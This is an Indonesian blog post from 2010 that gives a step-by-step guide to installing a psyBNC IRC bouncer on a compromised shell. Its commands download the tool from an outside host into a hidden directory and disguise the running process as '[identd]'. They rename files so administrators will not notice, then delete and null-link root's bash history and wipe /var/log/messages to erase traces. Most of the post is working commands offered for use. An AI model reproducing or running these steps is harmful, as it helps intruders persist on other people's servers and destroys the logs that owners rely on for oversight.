Senin, 04 Oktober 2010

Cara Membuat Psybnc Dari Shell/Target Dari scanner

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk
ke direktori tersebut
cd "...." <<-- masuk ke direktori
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x untuk mengetahui proses  di background shell
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
 psybnc anda yang berubah setelah kita lakukan trik tersebut namun
jangan keburu gembira dahulu, karena mungkin admin curiga dengan
 background yang ada di server tersebut dan admin akan mencarinya
 dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan
karena biasanya admin tahu kalau user selalu run psybnc
 maka akan nampak nama nama psybnc anda
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut
dengan yang lain semisal
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga
 terhadap background yang ada di server anda ;)
dan yang terakhir jangan lupa bersihkan log anda
dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages

Tidak ada komentar:

Posting Komentar